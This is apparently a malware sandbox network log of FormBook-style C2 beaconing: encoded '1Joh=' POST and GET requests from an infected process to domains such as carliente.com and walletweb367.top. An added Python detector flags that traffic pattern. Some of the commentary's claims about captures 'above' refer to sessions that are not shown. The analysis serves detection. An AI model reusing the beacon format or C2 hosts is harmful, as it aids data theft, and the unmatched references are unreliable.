                                                     May 16, 2024 17:19:49.194152117 CEST | 212 | IN | Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                    Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7
                                                     May 16, 2024 17:19:49.203298092 CEST | 687 | IN | Data Raw: 92 8e a8 10 87 09 4a 51 64 f7 ad 2b 45 b4 49 c9 9b f1 15 d6 3f 7f 32 07 08 80 9d d0 9b 2e fb c7 1c f8 51 e0 ae 22 e0 78 aa 93 f0 90 ce d7 58 13 5b 19 d2 de b0 fa e1 fa 69 ef 6f ea 6b ce 16 63 81 1f 3a bc 81 1e 9a be c7 d7 e3 16 d0 f5 99 af e2 38
                                                    Data Ascii: JQd+EI?2.Q"xX[iokc:8WeDZ4(:V41J}D#nu:Z3;6`9aKf.U[n6F5glJSsTEcfK|i(eOx.


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     14 | 192.168.2.9 | 49728 | 217.160.0.111 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:51.432033062 CEST | 756 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.carliente.com
                                                    Referer: http://www.carliente.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 76 5a 52 37 70 68 5a 33 53 61 46 32 62 52 7a 71 2f 46 58 39 49 4d 47 77 56 65 43 71 77 77 38 32 51 72 6c 55 33 65 4e 39 37 49 56 57 30 34 50 2f 39 31 53 53 6d 46 62 34 32 61 69 6a 37 38 56 5a 66 45 4e 61 47 72 4e 6c 74 32 6c 68 64 37 79 77 49 43 65 65 63 66 63 75 76 78 6c 79 47 61 71 67 35 72 71 6f 49 45 6f 6f 51 44 75 67 52 48 6c 62 31 74 4f 43 53 39 72 71 53 6d 33 51 4f 45 75 73 7a 48 66 39 6c 6d 48 69 56 4c 6c 2f 6b 34 79 63 53 77 46 6c 34 74 31 6e 71 43 34 42 77 57 32 76 4f 4a 7a 47 45 56 70 67 3d 3d
                                                    Data Ascii: 1Joh=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP1vZR7phZ3SaF2bRzq/FX9IMGwVeCqww82QrlU3eN97IVW04P/91SSmFb42aij78VZfENaGrNlt2lhd7ywICeecfcuvxlyGaqg5rqoIEooQDugRHlb1tOCS9rqSm3QOEuszHf9lmHiVLl/k4ycSwFl4t1nqC4BwW2vOJzGEVpg==
                                                     May 16, 2024 17:19:52.113498926 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Thu, 16 May 2024 15:19:51 GMT
                                                    Server: Apache
                                                    Content-Encoding: gzip
                                                    Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                    Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                     May 16, 2024 17:19:52.118772984 CEST | 212 | IN | Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                    Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7
                                                     May 16, 2024 17:19:52.132638931 CEST | 687 | IN | Data Raw: 92 8e a8 10 87 09 4a 51 64 f7 ad 2b 45 b4 49 c9 9b f1 15 d6 3f 7f 32 07 08 80 9d d0 9b 2e fb c7 1c f8 51 e0 ae 22 e0 78 aa 93 f0 90 ce d7 58 13 5b 19 d2 de b0 fa e1 fa 69 ef 6f ea 6b ce 16 63 81 1f 3a bc 81 1e 9a be c7 d7 e3 16 d0 f5 99 af e2 38
                                                    Data Ascii: JQd+EI?2.Q"xX[iokc:8WeDZ4(:V41J}D#nu:Z3;6`9aKf.U[n6F5glJSsTEcfK|i(eOx.
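Every session in this excerpt has the same beacon shape: a POST to /mcz6/ whose body is a single form field, 1Joh=<base64>, the same Firefox/36.0 User-Agent on each request, Origin and Referer pointing back at the host being posted to, the occasional GET carrying the same field name plus -xl in the query string, and the identical path and field name replayed against www.allinone24.shop, www.lenslaser.com and www.carliente.com in turn while the servers answer a 308, a 404 and a 200 respectively. The Python below is an added example for this report, not code from Joe Sandbox or from the sample; it parses requests of that shape, scores each on those indicators, and then correlates path and field name across hosts, which is the signal that survives when the domain changes. The 1Joh values are transcribed from the captures above (the allinone24.shop POST at the top of this excerpt, sessions 9 and 13, and the session 8 GET); the request text around them and the benign request are constructed. The indicator names, the 32-character minimum blob length and the 2-8 character path pattern are my own thresholds, not FormBook constants.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent observed verbatim on every request in the sessions above.
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) "
               "Gecko/20100101 Firefox/36.0")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")  # one short segment, e.g. /mcz6/ (assumed threshold)

def parse_request(raw):
    """Raw HTTP/1.1 request text -> dict; header names are lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in header_lines)}
    url = urlsplit(target)
    return {"method": method, "path": url.path, "query": url.query,
            "headers": headers, "body": body}

def split_form(data):
    """Split 'a=b&c=d' WITHOUT percent-decoding: the captured bodies carry raw
    '+' and '/', and urllib.parse.parse_qsl would turn every '+' into a space."""
    return [(k, v) for k, _, v in (i.partition("=") for i in data.split("&") if i)]

def looks_base64_blob(value, min_len=32):
    """True for a reasonably long string that decodes as base64."""
    if len(value) < min_len or not B64_RE.match(value):
        return False
    stripped = value.rstrip("=")
    try:  # tolerate missing padding, reject anything else malformed
        base64.b64decode(stripped + "=" * (-len(stripped) % 4))
    except ValueError:  # binascii.Error is a ValueError
        return False
    return True

def formbook_indicators(req):
    """Per-request indicator names; an empty list means nothing matched."""
    hits, h = [], req["headers"]
    host = h.get("host", "")
    if h.get("user-agent") == FORMBOOK_UA:
        hits.append("static-firefox36-ua")
    if SHORT_PATH_RE.match(req["path"]):
        hits.append("short-path")
    data = req["body"] if req["method"] == "POST" else req["query"]  # POST body / GET query
    blobs = [k for k, v in split_form(data) if looks_base64_blob(v)]
    if blobs:
        hits.append("b64-param:" + ",".join(blobs))
    if (req["method"] == "POST" and h.get("origin") == f"http://{host}"
            and h.get("referer") == f"http://{host}{req['path']}"):
        hits.append("self-referer")
    return hits

def domain_rotation(reqs, min_hosts=2):
    """(path, blob field name) -> sorted hosts, for combinations seen on at least
    min_hosts distinct hosts: the strongest signal in these captures."""
    hosts = defaultdict(set)
    for req in reqs:
        data = req["body"] if req["method"] == "POST" else req["query"]
        for k, v in split_form(data):
            if looks_base64_blob(v):
                hosts[(req["path"], k)].add(req["headers"].get("host", ""))
    return {k: sorted(v) for k, v in hosts.items() if len(v) >= min_hosts}

def _req(method, host, target, body=""):
    """Build a raw request in the shape of the captures above (constructed)."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}",
             f"User-Agent: {FORMBOOK_UA}", "Connection: close"]
    if method == "POST":
        lines += [f"Origin: http://{host}",
                  f"Referer: http://{host}{urlsplit(target).path}",
                  "Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body

# 1Joh values transcribed from the captures above (allinone24.shop POST at the top of
# this excerpt, sessions 9 and 13, the session 8 GET); everything else is constructed.
BLOB_ALLINONE = ("vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5WFnPdPtgXzgp/BGK9K2c5h+MpFmz"
                 "WHGeppCTAaMNNkLtrvDcGLFZNidZCZNAcAU0a7cuACZA3LFuCGTh3QJ7Atmf02PqNiwgUF"
                 "zGSzj3h2He0RetjZC0DaBwWTGIkuS0p+Qz6bX3wknNhpclruTJBMFqD2rxUlS5iCA5XYhw==")
BLOB_LENSLASER = ("ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9P"
                  "TyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv8"
                  "6Bm45e+L6xxwHhEWteMtKVaSkHlu83PLaX+dVUGWrcKrNqgq")
BLOB_CARLIENTE = ("g0NNOeEZLnaHNbE8VVeQsApvHl5uvn9diZxp4nf0PH7ZReVhYyyaC2bR8K/MZdI9GwYjCo"
                  "0w82ErlUHeNLzPXG06Hf9rfymFb42ainbWVavEMq2rMG1ppBd07QICPOcbcuuBlzqgql9r"
                  "qp4Ep60ElgR7q70NCXvLgpv6qjqQ79/CR8F4WQcQwokf17bY")
GET_BLOB = ("iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMks"
            "y59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw==")
SAMPLES = [
    _req("POST", "www.allinone24.shop", "/mcz6/", "1Joh=" + BLOB_ALLINONE),
    _req("POST", "www.lenslaser.com", "/mcz6/", "1Joh=" + BLOB_LENSLASER),
    _req("POST", "www.carliente.com", "/mcz6/", "1Joh=" + BLOB_CARLIENTE),
    _req("GET", "www.allinone24.shop", "/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=" + GET_BLOB),
    "GET /search?q=laser+lens HTTP/1.1\r\nHost: www.example.com\r\n"  # constructed benign request
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0\r\n\r\n",
]
```

Run it as `parsed = [parse_request(r) for r in SAMPLES]`, then `formbook_indicators(req)` per request and `domain_rotation(parsed)` over the set. Two points matter in practice. The form bodies are not percent-encoded (raw + and / are visible in the captures), so a parser built on urllib.parse.parse_qsl silently turns each + into a space and the blob then fails any base64 check; the example splits the body itself for that reason. And a 200 from one host in the rotation does not by itself identify the live C2: the same path and field name go to hosts that answer 404 and a redirect, so the per-request indicators are for triage and the cross-host correlation is the part worth alerting on.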


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     15 | 192.168.2.9 | 49729 | 217.160.0.111 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:53.965930939 CEST | 1769 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.carliente.com
                                                    Referer: http://www.carliente.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 33 5a 52 4a 78 68 62 57 53 61 45 32 62 52 74 36 2f 49 58 39 49 72 47 77 4d 5a 43 71 38 47 38 30 6f 72 6e 31 58 65 61 34 62 49 66 57 30 34 44 66 39 6f 66 79 6d 71 62 37 65 65 69 6e 58 38 56 5a 66 45 4e 59 65 72 4b 32 31 32 6e 68 64 30 37 51 49 4f 50 4f 63 37 63 75 32 4a 6c 79 7a 74 72 54 78 72 71 49 59 45 71 61 49 44 6e 67 52 2f 78 37 31 50 4f 43 57 75 72 75 7a 66 33 52 36 75 75 74 48 48 64 4b 6f 72 65 53 4a 50 33 4e 45 52 30 39 36 59 41 67 41 50 38 46 50 66 73 67 55 52 70 61 36 59 77 30 4a 4e 72 61 34 52 76 6c 38 63 2f 2b 2b 58 50 37 67 4a 68 55 31 58 2f 42 63 6f 2f 49 4f 55 64 76 35 50 56 68 2f 49 57 31 37 4f 75 46 76 49 6b 47 63 68 47 68 67 57 43 34 5a 73 65 50 37 52 31 2b 31 44 32 31 32 38 53 70 42 6d 2f 67 58 56 57 55 39 2b 75 32 72 75 57 4c 31 34 39 7a 6b 51 2b 56 59 4e 68 5a 44 4d 79 4e 49 52 6a 49 42 6c 51 4e 6d 4f 57 2f 46 43 78 56 75 48 69 50 46 47 4b [TRUNCATED]
                                                     Data Ascii: 1Joh= [TRUNCATED]


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     16 | 192.168.2.9 | 49730 | 217.160.0.111 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:19:56.497937918 CEST | 473 bytes | OUT | GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA== HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                     May 16, 2024 17:19:57.187951088 CEST | 1236 bytes | IN | HTTP/1.1 200 OK
                                                    Content-Type: text/html
                                                    Content-Length: 4545
                                                    Connection: close
                                                    Date: Thu, 16 May 2024 15:19:57 GMT
                                                    Server: Apache
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                     May 16, 2024 17:19:57.190057039 CEST | 1236 bytes | IN | Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                    Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                     May 16, 2024 17:19:57.194837093 CEST | 1236 bytes | IN | Data Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                    Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                     May 16, 2024 17:19:57.199682951 CEST | 975 bytes | IN | Data Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                    Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     17 | 192.168.2.9 | 49731 | 91.195.240.123 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:03.048419952 CEST | 741 bytes | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.walletweb367.top
                                                    Referer: http://www.walletweb367.top/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 37 71 35 66 72 37 67 37 4c 47 6a 48 41 78 62 6e 46 73 63 5a 33 54 44 75 46 32 30 71 45 41 59 67 55 54 57 49 53 6f 5a 75 58 43 30 77 57 4d 59 6c 70 63 50 50 45 7a 4a 77 73 35 37 77 59 54 45 74 71 64 67 67 35 71 30 67 39 4e 72 52 58 42 39 6b 42 77 51 79 4c 67 43 55 34 36 4c 44 4b 75 4a 2f 43 46 36 33 51 32 2f 65 78 4a 39 50 33 37 34 58 57 72 61 49 36 49 6a 6f 34 46 61 57 32 5a 49 38 50 4c 57 71 39 6b 71 7a 65 43 6b 4a 5a 6b 79 73 37 45 65 32 78 31 72 45 56 45 46 6c 2b 30 51 55 4a 47 4e 36 67 46 4b 53 47 6b 54 42 68 61 7a 74
                                                    Data Ascii: 1Joh=zJoyZiUMOHpB7q5fr7g7LGjHAxbnFscZ3TDuF20qEAYgUTWISoZuXC0wWMYlpcPPEzJws57wYTEtqdgg5q0g9NrRXB9kBwQyLgCU46LDKuJ/CF63Q2/exJ9P374XWraI6Ijo4FaW2ZI8PLWq9kqzeCkJZkys7Ee2x1rEVEFl+0QUJGN6gFKSGkTBhazt


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     18 | 192.168.2.9 | 49732 | 91.195.240.123 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:05.587965965 CEST | 765 bytes | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.walletweb367.top
                                                    Referer: http://www.walletweb367.top/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 79 4d 67 56 79 6d 49 41 70 5a 75 55 43 30 77 5a 73 59 67 6b 38 50 79 45 7a 45 44 73 37 2f 77 59 58 73 74 71 5a 6b 67 35 62 30 68 39 64 72 58 43 78 39 6d 4d 51 51 79 4c 67 43 55 34 36 65 6d 4b 75 52 2f 43 52 47 33 42 6b 48 5a 74 35 39 4f 2b 62 34 58 41 62 61 4d 36 49 6a 47 34 45 47 38 32 64 34 38 50 4b 6d 71 38 32 43 77 4a 79 6b 50 48 6b 7a 53 79 46 50 4a 71 55 57 5a 4c 6e 74 56 72 6e 41 6b 4f 6e 74 6b 78 33 44 4a 54 7a 54 6d 6d 39 36 46 56 6b 50 75 67 37 4a 61 49 65 48 64 39 35 51 41 46 2b 6c 6a 57 77 3d 3d
                                                    Data Ascii: 1Joh=zJoyZiUMOHpBpaJfoYY7amjYKRbnMMdS3THuF3A6DyMgVymIApZuUC0wZsYgk8PyEzEDs7/wYXstqZkg5b0h9drXCx9mMQQyLgCU46emKuR/CRG3BkHZt59O+b4XAbaM6IjG4EG82d48PKmq82CwJykPHkzSyFPJqUWZLntVrnAkOntkx3DJTzTmm96FVkPug7JaIeHd95QAF+ljWw==


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     19 | 192.168.2.9 | 49733 | 91.195.240.123 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:08.125835896 CEST | 1778 bytes | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.walletweb367.top
                                                    Referer: http://www.walletweb367.top/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
